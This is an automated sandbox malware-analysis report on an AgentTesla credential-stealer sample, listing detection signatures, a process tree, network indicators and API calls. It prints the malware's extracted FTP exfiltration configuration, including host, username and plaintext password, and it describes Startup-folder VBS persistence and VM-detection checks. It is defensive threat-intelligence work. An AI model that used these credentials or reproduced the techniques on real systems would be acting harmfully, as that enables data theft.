Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XoRPyi5s1i.exe

Overview

General Information

Sample name:XoRPyi5s1i.exe
renamed because original name is a hash value
Original sample name:811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b.exe
Analysis ID:1587765
MD5:fc76d8b178c0aa094eba5fea74e82614
SHA1:f2f88413e1e3aed4fd731769037c3d2391d29c94
SHA256:811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XoRPyi5s1i.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\XoRPyi5s1i.exe" MD5: FC76D8B178C0AA094EBA5FEA74E82614)
    • unjuridically.exe (PID: 1936 cmdline: "C:\Users\user\Desktop\XoRPyi5s1i.exe" MD5: FC76D8B178C0AA094EBA5FEA74E82614)
      • RegSvcs.exe (PID: 1712 cmdline: "C:\Users\user\Desktop\XoRPyi5s1i.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • unjuridically.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: FC76D8B178C0AA094EBA5FEA74E82614)
      • RegSvcs.exe (PID: 6796 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 23 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.unjuridically.exe.f60000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.unjuridically.exe.f60000.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  2.2.unjuridically.exe.f60000.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    2.2.unjuridically.exe.f60000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    2.2.unjuridically.exe.f60000.0.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x3196b:$s2: GetPrivateProfileString
                    • 0x31018:$s3: get_OSFullName
                    • 0x32706:$s5: remove_Key
                    • 0x328b3:$s5: remove_Key
                    • 0x33795:$s6: FtpWebRequest
                    • 0x34717:$s7: logins
                    • 0x34c89:$s7: logins
                    • 0x3798e:$s7: logins
                    • 0x37a4c:$s7: logins
                    • 0x393a1:$s7: logins
                    • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 18 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 4908, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 4908, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe, ProcessId: 1936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T17:51:38.374886+010020299271A Network Trojan was detected192.168.2.849711162.241.62.6321TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T17:51:38.771740+010028555421A Network Trojan was detected192.168.2.849712162.241.62.6343704TCP
                    2025-01-10T17:51:38.778606+010028555421A Network Trojan was detected192.168.2.849712162.241.62.6343704TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeReversingLabs: Detection: 63%
                    Multi AV Scanner detection for submitted file
                    Source: XoRPyi5s1i.exeReversingLabs: Detection: 63%
                    Source: XoRPyi5s1i.exeVirustotal: Detection: 74%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: XoRPyi5s1i.exeJoe Sandbox ML: detected
                    Source: XoRPyi5s1i.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00176CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00176CA9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_001760DD
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_001763F9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0017EB60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017F56F FindFirstFileW,FindClose,1_2_0017F56F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0017F5FA
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00181B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181B2F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00181C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181C8A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00181F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00181F94
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01016CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_01016CA9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_010160DD
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_010163F9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0101EB60
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101F56F FindFirstFileW,FindClose,2_2_0101F56F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0101F5FA
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01021B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021B2F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01021C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021C8A
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01021F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_01021F94

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49712 -> 162.241.62.63:43704
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49711 -> 162.241.62.63:21
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.8:49712 -> 162.241.62.63:43704
                    Source: global trafficTCP traffic: 192.168.2.8:65240 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 162.241.62.63 162.241.62.63
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownFTP traffic detected: 162.241.62.63:21 -> 192.168.2.8:49711 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 10:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 10:51. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 10:51. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00184EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00184EB5
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1756396983.0000000000926000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00186B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00186B0C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00186D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00186D07
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01026D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_01026D07
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00186B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00186B0C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00172B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00172B37
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0019F7FF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0103F7FF

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: This is a third-party compiled AutoIt script.1_2_00133D19
                    Source: XoRPyi5s1i.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: XoRPyi5s1i.exe, 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_23812d10-c
